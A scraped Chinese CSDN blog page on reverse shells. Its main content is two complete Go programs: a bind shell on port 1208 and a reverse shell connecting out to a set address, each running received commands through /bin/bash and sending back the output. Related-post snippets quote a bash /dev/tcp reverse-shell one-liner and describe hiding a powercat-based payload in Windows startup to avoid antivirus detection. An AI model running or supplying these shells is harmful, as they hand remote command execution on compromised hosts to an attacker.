mysql 反弹shell_golang反弹shell脚本

最新推荐文章于 2024-05-19 10:11:12 发布
最新推荐文章于 2024-05-19 10:11:12 发布
阅读量216 收藏
点赞数
文章标签: mysql 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31293685/article/details/113438332
版权

一、Golang语言

package main

import (

"fmt"

"net"

"strings"

"io/ioutil"

"log"

"os/exec"

)

func cmd_connect(c net.Conn) {

if c == nil {

return

}

buf := make([]byte, 4096)

for {

cnt, err := c.Read(buf)

if err != nil || cnt == 0 {

c.Close()

break

}

inStr := strings.TrimSpace(string(buf[0:cnt]))

inputs := strings.Split(inStr, " ")

switch inputs[0] {

case "quit":

c.Close()

break

default:

var cmd_str string

for _,value := range inputs {

if cmd_str == "" {

cmd_str = value

}else {

cmd_str = cmd_str+" "+value

}

}

cmd := exec.Command("/bin/bash","-c",cmd_str)

stdout, err := cmd.StdoutPipe()

if err != nil {

log.Fatal(err)

}

defer stdout.Close()

if err := cmd.Start(); err != nil {

log.Fatal(err)

}

// 读取输出结果

opBytes, err := ioutil.ReadAll(stdout)

if err != nil {

log.Fatal(err)

}

c.Write([]byte(opBytes))

}

}

}

func main() {

server, err := net.Listen("tcp", ":1208")

if err != nil {

fmt.Printf("Fail to start server, %s\n", err)

}

for {

conn, err := server.Accept()

if err != nil {

break

}

go cmd_connect(conn)

}

}

二、反向连接

package main

import (

"io"

"net"

"io/ioutil"

"log"

"os/exec"

)

var (

cmd string

line string

)

func main() {

addr := "127.0.0.1:8080" //远程连接主机名

conn,err := net.Dial("tcp",addr) //拨号操作,用于连接服务端,需要指定协议。

if err != nil {

log.Fatal(err)

}

buf := make([]byte,10240) //定义一个切片的长度是10240。

for {

n,err := conn.Read(buf) //接受的命令

if err != nil && err != io.EOF { //io.EOF在网络编程中表示对端把链接关闭了。

log.Fatal(err)

}

cmd_str := string(buf[:n])

cmd := exec.Command("/bin/bash","-c",cmd_str) //命令执行

stdout, err := cmd.StdoutPipe()

if err != nil {

log.Fatal(err)

}

defer stdout.Close()

if err := cmd.Start(); err != nil {

log.Fatal(err)

}

opBytes, err := ioutil.ReadAll(stdout)

if err != nil {

log.Fatal(err)

}

conn.Write([]byte(opBytes)) //返回执行结果

}

}

美洲狮梅西
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql反弹shell
weixin_40416851的博客
02-10 707
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网。
【权限提升】六种数据库提权&口令获取
今天是几号的博客
02-15 1627
MSF会将dll文件写入lib\plugin\目录下(前提是该目录存在,需手工创建),该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。前提是拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令。绑定需要访问数据库的IP。
玄机-第二章日志分析-mysql应急响应
最新发布
JACKBREAK的博客
05-19 1296
玄机应急响应靶场日记
windows 已拿到mysql权限最简单的反弹shell方式
YZBPXX
12-05 611
大多数人mysql密码是123456 这个时候如果还开放了该端口 可就危险了 需要运行的是5.x版本的mysql (一般老师教学都是这个版本) 对比网上powercat 脚本多了步把powercat替换成nn命令,这样windows就无法检测出病毒,同时使用vbs 来运行bat也使得用户不易察觉。 注意以下是将病毒植入开机启动程序,需要开机时才能启动 服务器需要做的事 将脚本上传到客户端可以访问的地方(如启动自带的aphacl,将脚本添加到index.html文件的链接里) 服务器启动nc -.
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1371
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
面试题,包含redis、mysql、php、golang、微服务、linux、http、web
05-02
面试中可能会讨论Linux命令行、文件系统、进程管理、用户权限、网络配置、系统日志、性能监控、Shell脚本编写、服务管理和系统调优等。 7. **HTTP**:超文本传输协议(HTTP)是互联网上应用最为广泛的一种网络协议...
shell:基础结构管理Shell-Linux
02-04
这是一组安装脚本,它可以实现服务器的快速初始化。 安装 git clone https://github.com/oscm/shell.git 更新资料 git pull CentOS初始化 curl -s ...
一键安装linux软件的脚本
08-17
脚本内容包含,tomcat、redis、node、nginx、mysql、mongodb、maven、php、golang、grafana,其中运行的时候,难免会出现一点小问题,但是影响不大,运行的时候最好是裸机运行,不是裸机的话难免会有一点冲突 ...
Evaluation_tools:测评工具
05-03
Linuxcapos_for_linux_v2.6.2sh 红帽系linxu版本测评使用,兼容Red-Hat、CentOS、EulerOS、Asianux、Ubuntu 16、Oracle、Mysql、Postgresql,做了一些小优化,比如添加了运行消息提示,添加了中文注释,Mysql口令输入...
php+shell+go=master服务
04-14
当需要进行复杂计算或者与硬件交互时,Go程序可以通过子进程调用Shell脚本来完成,然后利用Go的并发机制处理多个请求。这种结合方式可以充分利用Go的性能优势和Shell的灵活性。 **PHP、Shell与Go的协作** 在"master...
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
mysql_reverse_udf.zip
08-02
mysql反弹端口提权利用dll文件。
mysql 反弹shell_Discuz-ssrf利用计划任务反弹shell
weixin_39634898的博客
01-27 237
#001 环境搭建:Centos7(安装有apache,php,mysql,redis)利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/改一下权限然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写但是查看权限是有的经过各种尝试无果,开始了漫长的百度之旅,皇天不负有心人...
mysql 反弹shell_反弹shell升级成交互式shell
weixin_39640573的博客
01-27 584
实验环境:A : kali 虚拟机B: centos7.5 虚拟机1. A 机 kali 虚拟机 设置监听 端口root@kali64:~# nc -lvvp 9001# 端口随便定义,没被使用就行2. B机 执行命令反弹shell[root@localhost ~]# bash -i >& /dev/tcp/192.168.2.128/9001 0>&1# ip地...
OSCP靶场6-Stapler(用户收集、wordpress、SMB、mysql上传文件执行反弹shell、用户历史命令)
墨痕诉清风的博客
06-06 332
步骤 0:目标发现所以……和往常一样,让我们​​看看我们的目标在网络上的位置10.10.10.1 是 DHCP 服务器……让 10.10.10.2 成为“受害者”机器第 1 步:TCP 开放端口扫描为了速度,我们现在不会专注于版本扫描等……我们只是想看看有什么是活着的虽然有些端口看起来很明显,但还有一些其他端口,例如 '666' 被错误地表示为 'doom' - 这些只是特定端口号的 nmap 默认值。我们需要进行更详细的扫描,以查看真正活着的东西。第 2 步:TCP 主动端口扫描。
mysql反弹shell_MySQL Rootkit 反弹Shell--PHP
weixin_39520013的博客
01-19 281
好多人在渗透的时候,知道得到了SA的密码知道该怎么办,但是得到了MYSQL的root密码之后却迷茫了(多说句废话,默认在windows文件夹中保存my.ini里面写有root密码,而且windows有访问的权限,我们学校的服务器就是这么搞到的,汗···),我当初就迷茫过。后来得知用UDF create新函数可以执行命令,但是有时候却会出现意外的情况等等利用不是很好。终于有一天JOLI大叔随手抛给我...
权限提升-MYSQL数据库提权
m0_65336233的博客
12-05 1786
提权漏洞-数据库提权
mysql反弹提权_MySQL数据库反弹端口连接提权
weixin_42545292的博客
01-19 716
【51CTO.com原创稿件】在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令。在一般的情况下,也就放弃了。但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景:(1)通过网站无法获取webshell(2)Webshell无法执行命令(3)有phpmyadmin和root账号,无法查询或者无法获取网...
prometheus client_golang
09-15
Prometheus Client 是一个用于监控和度量的开源工具集,而 Prometheus Client Golang 是 Prometheus 官方提供的 Golang 版本的客户端库。允许 Golang 应用程序暴露指标(metrics)并将其暴露给 Prometheus 服务器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值